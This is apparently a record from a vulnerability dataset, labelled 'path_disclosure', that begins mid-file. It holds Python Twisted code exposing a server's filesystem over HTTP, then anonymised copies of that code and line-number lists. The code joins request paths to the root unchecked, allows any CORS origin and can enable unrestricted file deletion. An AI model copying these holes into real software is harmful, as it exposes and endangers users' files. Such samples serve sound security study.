if generator is None:
generator = self._glob(path)
for item in generator:
if os.path.isdir(item):
response_data['dirs'].append(item)
else:
response_data['files'].append(item)
return self._json_response(request, response_data)
def render_file(self, request, path):
"""
Return the contents of file *path*.
Args:
request (twisted.web.server.Request): HTTP request object
path: file path
Returns:
HTTP response with headers
"""
(_, ext) = os.path.splitext(path)
if ext in self.never_gzip_extensions:
# hack: remove gzip from the list of supported encodings
acceptHeaders = request.requestHeaders.getRawHeaders(
'accept-encoding', [])
supported = ','.join(acceptHeaders).split(',')
request.requestHeaders.setRawHeaders(
'accept-encoding', list(set(supported) - {'gzip'}))
result = twisted.web.static.File(
path, defaultType="application/octet-stream")
return result.render(request)
def render_GET(self, request):
"""
HTTP GET request handler returning
* legacy response if the query *file* or *dir* parameter is set
* file contents if *request.path* contains a file path
* directory listing if *request.path* contains a folder path
Args:
request (twisted.web.server.Request): HTTP request object
Returns:
HTTP response with headers
"""
attic_args = {'file', 'dir'}
if len(attic_args & set(request.args.keys())) >= 1:
return self.render_legacy(request)
request.setHeader(
'Access-Control-Allow-Origin', CORS_DEFAULT_ALLOW_ORIGIN)
try:
target_path = self._existing_path_or_bust(request)
except ValueError as vexc:
return self.error_response(
request, response_code=http.BAD_REQUEST, message=vexc.message)
except IOError as iexc:
return self.error_response(
request, response_code=http.NOT_FOUND, message=iexc.message)
if os.path.isdir(target_path):
return self.render_path_listing(request, target_path)
else:
return self.render_file(request, target_path)
def render_POST(self, request):
"""
HTTP POST request handler (currently NOT implemented).
Args:
request (twisted.web.server.Request): HTTP request object
Returns:
HTTP response with headers
"""
request.setHeader(
'Access-Control-Allow-Origin', CORS_DEFAULT_ALLOW_ORIGIN)
return self.error_response(request, response_code=http.NOT_IMPLEMENTED)
def render_PUT(self, request):
"""
HTTP PUT request handler (currently NOT implemented).
Args:
request (twisted.web.server.Request): HTTP request object
Returns:
HTTP response with headers
"""
request.setHeader(
'Access-Control-Allow-Origin', CORS_DEFAULT_ALLOW_ORIGIN)
return self.error_response(request, response_code=http.NOT_IMPLEMENTED)
def render_DELETE(self, request):
"""
HTTP DELETE request handler which may try to delete a file if its
path's prefix is in :py:data:`FileController._delete_whitelist` and
:py:data:`FileController._do_delete` is True.
Args:
request (twisted.web.server.Request): HTTP request object
Returns:
HTTP response with headers
"""
request.setHeader(
'Access-Control-Allow-Origin', CORS_DEFAULT_ALLOW_ORIGIN)
try:
target_path = self._existing_path_or_bust(request)
except ValueError as vexc:
return self.error_response(
request, response_code=http.BAD_REQUEST, message=vexc.message)
except IOError as iexc:
return self.error_response(
request, response_code=http.NOT_FOUND, message=iexc.message)
if os.path.isdir(target_path):
return self.error_response(
request, response_code=http.NOT_IMPLEMENTED,
message='Will not remove folder {!r}'.format(target_path))
for prefix in self._delete_whitelist:
if not target_path.startswith(os.path.abspath(prefix)):
return self.error_response(request,
response_code=http.FORBIDDEN)
response_data = self.get_response_data_template(request)
try:
response_data['result'] = True
if self._do_delete:
os.unlink(target_path)
message = 'Removed {!r}'.format(target_path)
else:
message = 'WOULD remove {!r}'.format(target_path)
response_data['message'] = message
except Exception as eexc:
response_data['message'] = 'Cannot remove {!r}: {!s}'.format(
target_path, eexc.message)
request.setResponseCode(http.INTERNAL_SERVER_ERROR)
return self._json_response(request, response_data)
if __name__ == '__main__':
from twisted.web.resource import Resource, EncodingResourceWrapper
from twisted.web.server import Site, GzipEncoderFactory
from twisted.internet import reactor
# standard factory example
factory_s = Site(FileController(DEFAULT_ROOT_PATH))
# experimental factory
root = Resource()
root.putChild("/", FileController)
root.putChild("/file", FileController)
factory_r = Site(root)
# experimental factory: enable gzip compression
wrapped = EncodingResourceWrapper(
FileController(
root=DEFAULT_ROOT_PATH,
# DANGER, WILL ROBINSON! These values allow deletion of ALL files!
do_delete=True, delete_whitelist=[]
),
[GzipEncoderFactory()])
factory_s_gz = Site(wrapped)
reactor.listenTCP(18888, factory_s_gz)
reactor.run()
| #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
RESTful Filesystem access using HTTP
------------------------------------
This controller and helper classes exposes parts or all of the server's
filesystem. Means to retrieve and delete files are provided as well as the
ability to list folder contents.
The generated responses are returned as JSON data with appropriate HTTP headers.
Output will be compressed using gzip most of the times.
Example calls using curl
++++++++++++++++++++++++
The following examples assume that the FileController instance is accessible
as '/file' on 'localhost', port 18888 (http://localhost:18888/file).
Fetch list of files and folders in root folder:
curl --noproxy localhost -iv http://localhost:18888/file
Fetch example file 'example.txt'
curl --noproxy localhost -iv http://localhost:18888/file/example.txt
Fetch gzipped example file 'example.txt'
curl --compressed -H "Accept-Encoding: gzip" --noproxy localhost -iv http://localhost:18888/file/example.txt
Delete example file 'example.txt'
curl --noproxy localhost -iv -X DELETE http://localhost:18888/file/example.txt
"""
import os
import json
import glob
import re
import urlparse
import twisted.web.static
from twisted.web import http
from utilities import MANY_SLASHES_REGEX
import file
#: default path from which files will be served
DEFAULT_ROOT_PATH = os.path.abspath(os.path.dirname(__file__))
#: CORS - HTTP headers the client may use
CORS_ALLOWED_CLIENT_HEADERS = [
'Content-Type',
]
#: CORS - HTTP methods the client may use
CORS_ALLOWED_METHODS_DEFAULT = ['GET', 'PUT', 'POST', 'DELETE', 'OPTIONS']
#: CORS - default origin header value
CORS_DEFAULT_ALLOW_ORIGIN = '*'
#: CORS - HTTP headers the server will send as part of OPTIONS response
CORS_DEFAULT = {
'Access-Control-Allow-Origin': CORS_DEFAULT_ALLOW_ORIGIN,
'Access-Control-Allow-Credentials': 'true',
'Access-Control-Max-Age': '86400',
'Access-Control-Allow-Methods': ','.join(CORS_ALLOWED_METHODS_DEFAULT),
'Access-Control-Allow-Headers': ', '.join(CORS_ALLOWED_CLIENT_HEADERS)
}
#: paths where file delete operations shall be allowed
DELETE_WHITELIST = [
'/media',
]
class FileController(twisted.web.resource.Resource):
isLeaf = True
_override_args = (
'resource_prefix', 'root', 'do_delete', 'delete_whitelist')
_resource_prefix = '/file'
_root = os.path.abspath(os.path.dirname(__file__))
_do_delete = False
_delete_whitelist = DELETE_WHITELIST
never_gzip_extensions = ('.ts',)
def __init__(self, *args, **kwargs):
"""
Default Constructor.
Args:
resource_prefix: Prefix value for this controller instance.
Default is :py:data:`FileController._resource_prefix`
root: Root path of files to be served.
Default is the path where the current file is located
do_delete: Try to actually delete files?
Default is False.
delete_whitelist: Folder prefixes where delete operations are
allowed _at all_. Default is :py:data:`DELETE_WHITELIST`
"""
if args:
for key, value in zip(self._override_args, args):
kwargs[key] = value
for arg_name in self._override_args:
if kwargs.get(arg_name) is not None:
attr_name = '_{:s}'.format(arg_name)
setattr(self, attr_name, kwargs.get(arg_name))
self.session = kwargs.get("session")
def _json_response(self, request, data):
"""
Create a JSON representation for *data* and set HTTP headers indicating
that JSON encoded data is returned.
Args:
request (twisted.web.server.Request): HTTP request object
data: response content
Returns:
JSON representation of *data* with appropriate HTTP headers
"""
request.setHeader("content-type", "application/json; charset=utf-8")
return json.dumps(data, indent=2)
def get_response_data_template(self, request):
"""
Generate a response data :class:`dict` containing default values and
some request attribute values for debugging purposes.
Args:
request (twisted.web.server.Request): HTTP request object
Returns:
(dict) response template data
"""
file_path = None
if request.path.startswith(self._resource_prefix):
file_path = request.path[len(self._resource_prefix):]
response_data = {
"_request": {
"path": request.path,
"uri": request.uri,
"method": request.method,
"postpath": request.postpath,
"file_path": file_path,
},
"result": False,
}
return response_data
def error_response(self, request, response_code=None, **kwargs):
"""
Create and return an HTTP error response with data as JSON.
Args:
request (twisted.web.server.Request): HTTP request object
response_code: HTTP Status Code (default is 500)
**kwargs: additional key/value pairs
Returns:
JSON encoded data with appropriate HTTP headers
"""
if response_code is None:
response_code = http.INTERNAL_SERVER_ERROR
response_data = self.get_response_data_template(request)
response_data.update(**kwargs)
response_data['me'] = dict()
for arg_name in self._override_args:
attr_name = '_{:s}'.format(arg_name)
response_data['me'][attr_name] = getattr(self, attr_name)
request.setResponseCode(response_code)
return self._json_response(request, response_data)
def _existing_path_or_bust(self, request):
"""
Verify that a filesystem location which is contained in *request.path*
is valid and an existing path.
Args:
request (twisted.web.server.Request): HTTP request object
Returns:
path
Raises:
ValueError: If contained path value is invalid.
IOError: If contained path value is not existing.
"""
rq_path = urlparse.unquote(request.path)
if not rq_path.startswith(self._resource_prefix):
raise ValueError("Invalid Request Path {!r}".format(request.path))
file_path = os.path.join(
self._root, rq_path[len(self._resource_prefix) + 1:])
file_path = re.sub(MANY_SLASHES_REGEX, '/', file_path)
if not os.path.exists(file_path):
raise IOError("Not Found {!r}".format(file_path))
return file_path
def render_OPTIONS(self, request):
"""
Render response for an HTTP OPTIONS request.
Example request
curl -iv --noproxy localhost http://localhost:18888/file
Args:
request (twisted.web.server.Request): HTTP request object
Returns:
HTTP response with headers
"""
for key in CORS_DEFAULT:
request.setHeader(key, CORS_DEFAULT[key])
return ''
def render_legacy(self, request):
"""
Render response for an HTTP GET request. In order to maintain
backward compatibility this method emulates the behaviour of the
legacy method implementation.
Args:
request (twisted.web.server.Request): HTTP request object
Returns:
HTTP response with headers
"""
return file.FileController().render(request)
def _glob(self, path, pattern='*'):
if path == '/':
glob_me = '/' + pattern
else:
glob_me = '/'.join((path, pattern))
return glob.iglob(glob_me)
def _walk(self, path):
for root, dirs, files in os.walk(path):
for dir_item in dirs:
yield os.path.join(root, dir_item)
for file_item in files:
yield os.path.join(root, file_item)
def render_path_listing(self, request, path):
"""
Generate a file/folder listing of *path*'s contents.
Args:
request (twisted.web.server.Request): HTTP request object
path: folder location
Returns:
HTTP response with headers
"""
response_data = self.get_response_data_template(request)
response_data.update(
{
'result': True,
'dirs': [],
'files': [],
}
)
generator = None
if "pattern" in request.args:
generator = self._glob(path, request.args["pattern"][0])
if "recursive" in request.args:
generator = self._walk(path)
if generator is None:
generator = self._glob(path)
for item in generator:
if os.path.isdir(item):
response_data['dirs'].append(item)
else:
response_data['files'].append(item)
return self._json_response(request, response_data)
def render_file(self, request, path):
"""
Return the contents of file *path*.
Args:
request (twisted.web.server.Request): HTTP request object
path: file path
Returns:
HTTP response with headers
"""
(_, ext) = os.path.splitext(path)
if ext in self.never_gzip_extensions:
# hack: remove gzip from the list of supported encodings
acceptHeaders = request.requestHeaders.getRawHeaders(
'accept-encoding', [])
supported = ','.join(acceptHeaders).split(',')
request.requestHeaders.setRawHeaders(
'accept-encoding', list(set(supported) - {'gzip'}))
result = twisted.web.static.File(
path, defaultType="application/octet-stream")
return result.render(request)
def render_GET(self, request):
"""
HTTP GET request handler returning
* legacy response if the query *file* or *dir* parameter is set
* file contents if *request.path* contains a file path
* directory listing if *request.path* contains a folder path
Args:
request (twisted.web.server.Request): HTTP request object
Returns:
HTTP response with headers
"""
attic_args = {'file', 'dir'}
if len(attic_args & set(request.args.keys())) >= 1:
return self.render_legacy(request)
request.setHeader(
'Access-Control-Allow-Origin', CORS_DEFAULT_ALLOW_ORIGIN)
try:
target_path = self._existing_path_or_bust(request)
except ValueError as vexc:
return self.error_response(
request, response_code=http.BAD_REQUEST, message=vexc.message)
except IOError as iexc:
return self.error_response(
request, response_code=http.NOT_FOUND, message=iexc.message)
if os.path.isdir(target_path):
return self.render_path_listing(request, target_path)
else:
return self.render_file(request, target_path)
def render_POST(self, request):
"""
HTTP POST request handler (currently NOT implemented).
Args:
request (twisted.web.server.Request): HTTP request object
Returns:
HTTP response with headers
"""
request.setHeader(
'Access-Control-Allow-Origin', CORS_DEFAULT_ALLOW_ORIGIN)
return self.error_response(request, response_code=http.NOT_IMPLEMENTED)
def render_PUT(self, request):
"""
HTTP PUT request handler (currently NOT implemented).
Args:
request (twisted.web.server.Request): HTTP request object
Returns:
HTTP response with headers
"""
request.setHeader(
'Access-Control-Allow-Origin', CORS_DEFAULT_ALLOW_ORIGIN)
return self.error_response(request, response_code=http.NOT_IMPLEMENTED)
def render_DELETE(self, request):
"""
HTTP DELETE request handler which may try to delete a file if its
path's prefix is in :py:data:`FileController._delete_whitelist` and
:py:data:`FileController._do_delete` is True.
Args:
request (twisted.web.server.Request): HTTP request object
Returns:
HTTP response with headers
"""
request.setHeader(
'Access-Control-Allow-Origin', CORS_DEFAULT_ALLOW_ORIGIN)
try:
target_path = self._existing_path_or_bust(request)
except ValueError as vexc:
return self.error_response(
request, response_code=http.BAD_REQUEST, message=vexc.message)
except IOError as iexc:
return self.error_response(
request, response_code=http.NOT_FOUND, message=iexc.message)
if os.path.isdir(target_path):
return self.error_response(
request, response_code=http.NOT_IMPLEMENTED,
message='Will not remove folder {!r}'.format(target_path))
for prefix in self._delete_whitelist:
if not target_path.startswith(os.path.abspath(prefix)):
return self.error_response(request,
response_code=http.FORBIDDEN)
response_data = self.get_response_data_template(request)
try:
response_data['result'] = True
if self._do_delete:
os.unlink(target_path)
message = 'Removed {!r}'.format(target_path)
else:
message = 'WOULD remove {!r}'.format(target_path)
response_data['message'] = message
except Exception as eexc:
response_data['message'] = 'Cannot remove {!r}: {!s}'.format(
target_path, eexc.message)
request.setResponseCode(http.INTERNAL_SERVER_ERROR)
return self._json_response(request, response_data)
if __name__ == '__main__':
from twisted.web.resource import Resource, EncodingResourceWrapper
from twisted.web.server import Site, GzipEncoderFactory
from twisted.internet import reactor
# standard factory example
factory_s = Site(FileController(DEFAULT_ROOT_PATH))
# experimental factory
root = Resource()
root.putChild("/", FileController)
root.putChild("/file", FileController)
factory_r = Site(root)
# experimental factory: enable gzip compression
wrapped = EncodingResourceWrapper(
FileController(
root=DEFAULT_ROOT_PATH,
# DANGER, WILL ROBINSON! These values allow deletion of ALL files!
do_delete=True, delete_whitelist=[]
),
[GzipEncoderFactory()])
factory_s_gz = Site(wrapped)
reactor.listenTCP(18888, factory_s_gz)
reactor.run()
| path_disclosure | {
"code": [
"MANY_SLASHES_PATTERN = r'[\\/]+'",
"MANY_SLASHES_REGEX = re.compile(MANY_SLASHES_PATTERN)"
],
"line_no": [
48,
49
]
} | {
"code": [
"from utilities import MANY_SLASHES_REGEX"
],
"line_no": [
46
]
} |
import os
import json
import glob
import re
import urlparse
import twisted.web.static
from twisted.web import http
import file
VAR_0 = r'[\/]+'
VAR_1 = re.compile(VAR_0)
VAR_2 = os.path.abspath(os.path.dirname(__file__))
VAR_3 = [
'Content-Type',
]
VAR_4 = ['GET', 'PUT', 'POST', 'DELETE', 'OPTIONS']
VAR_5 = '*'
VAR_6 = {
'Access-Control-Allow-Origin': VAR_5,
'Access-Control-Allow-Credentials': 'true',
'Access-Control-Max-Age': '86400',
'Access-Control-Allow-Methods': ','.join(VAR_4),
'Access-Control-Allow-Headers': ', '.join(VAR_3)
}
VAR_7 = [
'/media',
]
class CLASS_0(twisted.web.resource.Resource):
VAR_8 = True
VAR_9 = (
'resource_prefix', 'root', 'do_delete', 'delete_whitelist')
VAR_10 = '/file'
VAR_11 = os.path.abspath(os.path.dirname(__file__))
VAR_12 = False
VAR_13 = VAR_7
VAR_14 = ('.ts',)
def __init__(self, *VAR_15, **VAR_16):
if VAR_15:
for VAR_40, value in zip(self._override_args, VAR_15):
VAR_16[VAR_40] = value
for arg_name in self._override_args:
if VAR_16.get(arg_name) is not None:
VAR_35 = '_{:s}'.format(arg_name)
setattr(self, VAR_35, VAR_16.get(arg_name))
self.session = VAR_16.get("session")
def FUNC_0(self, VAR_17, VAR_18):
VAR_17.setHeader("content-type", "application/json; charset=utf-8")
return json.dumps(VAR_18, indent=2)
def FUNC_1(self, VAR_17):
VAR_27 = None
if VAR_17.path.startswith(self._resource_prefix):
VAR_27 = VAR_17.path[len(self._resource_prefix):]
VAR_28 = {
"_request": {
"path": VAR_17.path,
"uri": VAR_17.uri,
"method": VAR_17.method,
"postpath": VAR_17.postpath,
"file_path": VAR_27,
},
"result": False,
}
return VAR_28
def FUNC_2(self, VAR_17, VAR_19=None, **VAR_16):
if VAR_19 is None:
VAR_19 = http.INTERNAL_SERVER_ERROR
VAR_28 = self.get_response_data_template(VAR_17)
VAR_28.update(**VAR_16)
VAR_28['me'] = dict()
for arg_name in self._override_args:
VAR_35 = '_{:s}'.format(arg_name)
VAR_28['me'][VAR_35] = getattr(self, VAR_35)
VAR_17.setResponseCode(VAR_19)
return self._json_response(VAR_17, VAR_28)
def FUNC_3(self, VAR_17):
VAR_29 = urlparse.unquote(VAR_17.path)
if not VAR_29.startswith(self._resource_prefix):
raise ValueError("Invalid Request Path {!r}".format(VAR_17.path))
VAR_27 = os.path.join(
self._root, VAR_29[len(self._resource_prefix) + 1:])
VAR_27 = re.sub(VAR_1, '/', VAR_27)
if not os.path.exists(VAR_27):
raise IOError("Not Found {!r}".format(VAR_27))
return VAR_27
def FUNC_4(self, VAR_17):
for VAR_40 in VAR_6:
VAR_17.setHeader(VAR_40, VAR_6[VAR_40])
return ''
def FUNC_5(self, VAR_17):
return file.FileController().render(VAR_17)
def FUNC_6(self, VAR_20, VAR_21='*'):
if VAR_20 == '/':
VAR_36 = '/' + VAR_21
else:
VAR_36 = '/'.join((VAR_20, VAR_21))
return glob.iglob(VAR_36)
def FUNC_7(self, VAR_20):
for VAR_23, dirs, files in os.walk(VAR_20):
for dir_item in dirs:
yield os.path.join(VAR_23, dir_item)
for file_item in files:
yield os.path.join(VAR_23, file_item)
def FUNC_8(self, VAR_17, VAR_20):
VAR_28 = self.get_response_data_template(VAR_17)
VAR_28.update(
{
'result': True,
'dirs': [],
'files': [],
}
)
VAR_30 = None
if "pattern" in VAR_17.args:
VAR_30 = self._glob(VAR_20, VAR_17.args["pattern"][0])
if "recursive" in VAR_17.args:
VAR_30 = self._walk(VAR_20)
if VAR_30 is None:
VAR_30 = self._glob(VAR_20)
for item in VAR_30:
if os.path.isdir(item):
VAR_28['dirs'].append(item)
else:
VAR_28['files'].append(item)
return self._json_response(VAR_17, VAR_28)
def FUNC_9(self, VAR_17, VAR_20):
(VAR_31, VAR_32) = os.path.splitext(VAR_20)
if VAR_32 in self.never_gzip_extensions:
VAR_37 = VAR_17.requestHeaders.getRawHeaders(
'accept-encoding', [])
VAR_38 = ','.join(VAR_37).split(',')
VAR_17.requestHeaders.setRawHeaders(
'accept-encoding', list(set(VAR_38) - {'gzip'}))
VAR_33 = twisted.web.static.File(
VAR_20, defaultType="application/octet-stream")
return VAR_33.render(VAR_17)
def FUNC_10(self, VAR_17):
VAR_34 = {'file', 'dir'}
if len(VAR_34 & set(VAR_17.args.keys())) >= 1:
return self.render_legacy(VAR_17)
VAR_17.setHeader(
'Access-Control-Allow-Origin', VAR_5)
try:
VAR_39 = self._existing_path_or_bust(VAR_17)
except ValueError as vexc:
return self.error_response(
VAR_17, VAR_19=http.BAD_REQUEST, VAR_41=vexc.message)
except IOError as iexc:
return self.error_response(
VAR_17, VAR_19=http.NOT_FOUND, VAR_41=iexc.message)
if os.path.isdir(VAR_39):
return self.render_path_listing(VAR_17, VAR_39)
else:
return self.render_file(VAR_17, VAR_39)
def FUNC_11(self, VAR_17):
VAR_17.setHeader(
'Access-Control-Allow-Origin', VAR_5)
return self.error_response(VAR_17, VAR_19=http.NOT_IMPLEMENTED)
def FUNC_12(self, VAR_17):
VAR_17.setHeader(
'Access-Control-Allow-Origin', VAR_5)
return self.error_response(VAR_17, VAR_19=http.NOT_IMPLEMENTED)
def FUNC_13(self, VAR_17):
VAR_17.setHeader(
'Access-Control-Allow-Origin', VAR_5)
try:
VAR_39 = self._existing_path_or_bust(VAR_17)
except ValueError as vexc:
return self.error_response(
VAR_17, VAR_19=http.BAD_REQUEST, VAR_41=vexc.message)
except IOError as iexc:
return self.error_response(
VAR_17, VAR_19=http.NOT_FOUND, VAR_41=iexc.message)
if os.path.isdir(VAR_39):
return self.error_response(
VAR_17, VAR_19=http.NOT_IMPLEMENTED,
VAR_41='Will not remove folder {!r}'.format(VAR_39))
for prefix in self._delete_whitelist:
if not VAR_39.startswith(os.path.abspath(prefix)):
return self.error_response(VAR_17,
VAR_19=http.FORBIDDEN)
VAR_28 = self.get_response_data_template(VAR_17)
try:
VAR_28['result'] = True
if self._do_delete:
os.unlink(VAR_39)
VAR_41 = 'Removed {!r}'.format(VAR_39)
else:
VAR_41 = 'WOULD remove {!r}'.format(VAR_39)
VAR_28['message'] = VAR_41
except Exception as eexc:
VAR_28['message'] = 'Cannot remove {!r}: {!s}'.format(
VAR_39, eexc.message)
VAR_17.setResponseCode(http.INTERNAL_SERVER_ERROR)
return self._json_response(VAR_17, VAR_28)
if __name__ == '__main__':
from twisted.web.resource import Resource, EncodingResourceWrapper
from twisted.web.server import Site, GzipEncoderFactory
from twisted.internet import reactor
VAR_22 = Site(CLASS_0(VAR_2))
VAR_23 = Resource()
VAR_23.putChild("/", CLASS_0)
VAR_23.putChild("/file", CLASS_0)
VAR_24 = Site(VAR_23)
VAR_25 = EncodingResourceWrapper(
CLASS_0(
VAR_23=VAR_2,
do_delete=True, delete_whitelist=[]
),
[GzipEncoderFactory()])
VAR_26 = Site(VAR_25)
reactor.listenTCP(18888, VAR_26)
reactor.run()
|
import os
import json
import glob
import re
import urlparse
import twisted.web.static
from twisted.web import http
from utilities import MANY_SLASHES_REGEX
import file
VAR_0 = os.path.abspath(os.path.dirname(__file__))
VAR_1 = [
'Content-Type',
]
VAR_2 = ['GET', 'PUT', 'POST', 'DELETE', 'OPTIONS']
VAR_3 = '*'
VAR_4 = {
'Access-Control-Allow-Origin': VAR_3,
'Access-Control-Allow-Credentials': 'true',
'Access-Control-Max-Age': '86400',
'Access-Control-Allow-Methods': ','.join(VAR_2),
'Access-Control-Allow-Headers': ', '.join(VAR_1)
}
VAR_5 = [
'/media',
]
class CLASS_0(twisted.web.resource.Resource):
VAR_6 = True
VAR_7 = (
'resource_prefix', 'root', 'do_delete', 'delete_whitelist')
VAR_8 = '/file'
VAR_9 = os.path.abspath(os.path.dirname(__file__))
VAR_10 = False
VAR_11 = VAR_5
VAR_12 = ('.ts',)
def __init__(self, *VAR_13, **VAR_14):
if VAR_13:
for VAR_38, value in zip(self._override_args, VAR_13):
VAR_14[VAR_38] = value
for arg_name in self._override_args:
if VAR_14.get(arg_name) is not None:
VAR_33 = '_{:s}'.format(arg_name)
setattr(self, VAR_33, VAR_14.get(arg_name))
self.session = VAR_14.get("session")
def FUNC_0(self, VAR_15, VAR_16):
VAR_15.setHeader("content-type", "application/json; charset=utf-8")
return json.dumps(VAR_16, indent=2)
def FUNC_1(self, VAR_15):
VAR_25 = None
if VAR_15.path.startswith(self._resource_prefix):
VAR_25 = VAR_15.path[len(self._resource_prefix):]
VAR_26 = {
"_request": {
"path": VAR_15.path,
"uri": VAR_15.uri,
"method": VAR_15.method,
"postpath": VAR_15.postpath,
"file_path": VAR_25,
},
"result": False,
}
return VAR_26
def FUNC_2(self, VAR_15, VAR_17=None, **VAR_14):
if VAR_17 is None:
VAR_17 = http.INTERNAL_SERVER_ERROR
VAR_26 = self.get_response_data_template(VAR_15)
VAR_26.update(**VAR_14)
VAR_26['me'] = dict()
for arg_name in self._override_args:
VAR_33 = '_{:s}'.format(arg_name)
VAR_26['me'][VAR_33] = getattr(self, VAR_33)
VAR_15.setResponseCode(VAR_17)
return self._json_response(VAR_15, VAR_26)
def FUNC_3(self, VAR_15):
VAR_27 = urlparse.unquote(VAR_15.path)
if not VAR_27.startswith(self._resource_prefix):
raise ValueError("Invalid Request Path {!r}".format(VAR_15.path))
VAR_25 = os.path.join(
self._root, VAR_27[len(self._resource_prefix) + 1:])
VAR_25 = re.sub(MANY_SLASHES_REGEX, '/', VAR_25)
if not os.path.exists(VAR_25):
raise IOError("Not Found {!r}".format(VAR_25))
return VAR_25
def FUNC_4(self, VAR_15):
for VAR_38 in VAR_4:
VAR_15.setHeader(VAR_38, VAR_4[VAR_38])
return ''
def FUNC_5(self, VAR_15):
return file.FileController().render(VAR_15)
def FUNC_6(self, VAR_18, VAR_19='*'):
if VAR_18 == '/':
VAR_34 = '/' + VAR_19
else:
VAR_34 = '/'.join((VAR_18, VAR_19))
return glob.iglob(VAR_34)
def FUNC_7(self, VAR_18):
for VAR_21, dirs, files in os.walk(VAR_18):
for dir_item in dirs:
yield os.path.join(VAR_21, dir_item)
for file_item in files:
yield os.path.join(VAR_21, file_item)
def FUNC_8(self, VAR_15, VAR_18):
VAR_26 = self.get_response_data_template(VAR_15)
VAR_26.update(
{
'result': True,
'dirs': [],
'files': [],
}
)
VAR_28 = None
if "pattern" in VAR_15.args:
VAR_28 = self._glob(VAR_18, VAR_15.args["pattern"][0])
if "recursive" in VAR_15.args:
VAR_28 = self._walk(VAR_18)
if VAR_28 is None:
VAR_28 = self._glob(VAR_18)
for item in VAR_28:
if os.path.isdir(item):
VAR_26['dirs'].append(item)
else:
VAR_26['files'].append(item)
return self._json_response(VAR_15, VAR_26)
def FUNC_9(self, VAR_15, VAR_18):
(VAR_29, VAR_30) = os.path.splitext(VAR_18)
if VAR_30 in self.never_gzip_extensions:
VAR_35 = VAR_15.requestHeaders.getRawHeaders(
'accept-encoding', [])
VAR_36 = ','.join(VAR_35).split(',')
VAR_15.requestHeaders.setRawHeaders(
'accept-encoding', list(set(VAR_36) - {'gzip'}))
VAR_31 = twisted.web.static.File(
VAR_18, defaultType="application/octet-stream")
return VAR_31.render(VAR_15)
def FUNC_10(self, VAR_15):
VAR_32 = {'file', 'dir'}
if len(VAR_32 & set(VAR_15.args.keys())) >= 1:
return self.render_legacy(VAR_15)
VAR_15.setHeader(
'Access-Control-Allow-Origin', VAR_3)
try:
VAR_37 = self._existing_path_or_bust(VAR_15)
except ValueError as vexc:
return self.error_response(
VAR_15, VAR_17=http.BAD_REQUEST, VAR_39=vexc.message)
except IOError as iexc:
return self.error_response(
VAR_15, VAR_17=http.NOT_FOUND, VAR_39=iexc.message)
if os.path.isdir(VAR_37):
return self.render_path_listing(VAR_15, VAR_37)
else:
return self.render_file(VAR_15, VAR_37)
def FUNC_11(self, VAR_15):
VAR_15.setHeader(
'Access-Control-Allow-Origin', VAR_3)
return self.error_response(VAR_15, VAR_17=http.NOT_IMPLEMENTED)
def FUNC_12(self, VAR_15):
VAR_15.setHeader(
'Access-Control-Allow-Origin', VAR_3)
return self.error_response(VAR_15, VAR_17=http.NOT_IMPLEMENTED)
def FUNC_13(self, VAR_15):
VAR_15.setHeader(
'Access-Control-Allow-Origin', VAR_3)
try:
VAR_37 = self._existing_path_or_bust(VAR_15)
except ValueError as vexc:
return self.error_response(
VAR_15, VAR_17=http.BAD_REQUEST, VAR_39=vexc.message)
except IOError as iexc:
return self.error_response(
VAR_15, VAR_17=http.NOT_FOUND, VAR_39=iexc.message)
if os.path.isdir(VAR_37):
return self.error_response(
VAR_15, VAR_17=http.NOT_IMPLEMENTED,
VAR_39='Will not remove folder {!r}'.format(VAR_37))
for prefix in self._delete_whitelist:
if not VAR_37.startswith(os.path.abspath(prefix)):
return self.error_response(VAR_15,
VAR_17=http.FORBIDDEN)
VAR_26 = self.get_response_data_template(VAR_15)
try:
VAR_26['result'] = True
if self._do_delete:
os.unlink(VAR_37)
VAR_39 = 'Removed {!r}'.format(VAR_37)
else:
VAR_39 = 'WOULD remove {!r}'.format(VAR_37)
VAR_26['message'] = VAR_39
except Exception as eexc:
VAR_26['message'] = 'Cannot remove {!r}: {!s}'.format(
VAR_37, eexc.message)
VAR_15.setResponseCode(http.INTERNAL_SERVER_ERROR)
return self._json_response(VAR_15, VAR_26)
if __name__ == '__main__':
from twisted.web.resource import Resource, EncodingResourceWrapper
from twisted.web.server import Site, GzipEncoderFactory
from twisted.internet import reactor
VAR_20 = Site(CLASS_0(VAR_0))
VAR_21 = Resource()
VAR_21.putChild("/", CLASS_0)
VAR_21.putChild("/file", CLASS_0)
VAR_22 = Site(VAR_21)
VAR_23 = EncodingResourceWrapper(
CLASS_0(
VAR_21=VAR_0,
do_delete=True, delete_whitelist=[]
),
[GzipEncoderFactory()])
VAR_24 = Site(VAR_23)
reactor.listenTCP(18888, VAR_24)
reactor.run()
| [
1,
2,
6,
10,
13,
16,
19,
21,
23,
25,
27,
29,
31,
33,
35,
42,
45,
47,
50,
51,
53,
54,
58,
59,
61,
62,
64,
65,
73,
74,
78,
79,
89,
93,
107,
113,
118,
127,
132,
141,
152,
154,
158,
168,
171,
176,
179,
184,
196,
200,
203,
205,
209,
211,
213,
221,
223,
229,
236,
243,
250,
254,
269,
273,
276,
279,
285,
287,
291,
299,
301,
307,
310,
312,
316,
320,
327,
330,
333,
342,
347,
351,
360,
364,
373,
379,
387,
396,
401,
406,
420,
422,
423,
428,
429,
431,
432,
437,
438,
442,
447,
450,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
16,
17,
18,
19,
20,
21,
22,
23,
24,
25,
26,
27,
28,
29,
30,
31,
32,
33,
34,
35,
36,
91,
92,
93,
94,
95,
96,
97,
98,
99,
100,
101,
102,
103,
115,
116,
117,
118,
119,
120,
121,
122,
123,
124,
129,
130,
131,
132,
133,
134,
135,
136,
137,
156,
157,
158,
159,
160,
161,
162,
163,
164,
165,
181,
182,
183,
184,
185,
186,
187,
188,
189,
190,
191,
192,
207,
208,
209,
210,
211,
212,
213,
214,
215,
216,
217,
218,
225,
226,
227,
228,
229,
230,
231,
232,
233,
234,
252,
253,
254,
255,
256,
257,
258,
259,
260,
289,
290,
291,
292,
293,
294,
295,
296,
297,
314,
315,
316,
317,
318,
319,
320,
321,
322,
323,
324,
325,
349,
350,
351,
352,
353,
354,
355,
356,
362,
363,
364,
365,
366,
367,
368,
369,
375,
376,
377,
378,
379,
380,
381,
382,
383,
384
] | [
1,
2,
6,
10,
13,
16,
19,
21,
23,
25,
27,
29,
31,
33,
35,
42,
45,
48,
49,
51,
52,
56,
57,
59,
60,
62,
63,
71,
72,
76,
77,
87,
91,
105,
111,
116,
125,
130,
139,
150,
152,
156,
166,
169,
174,
177,
182,
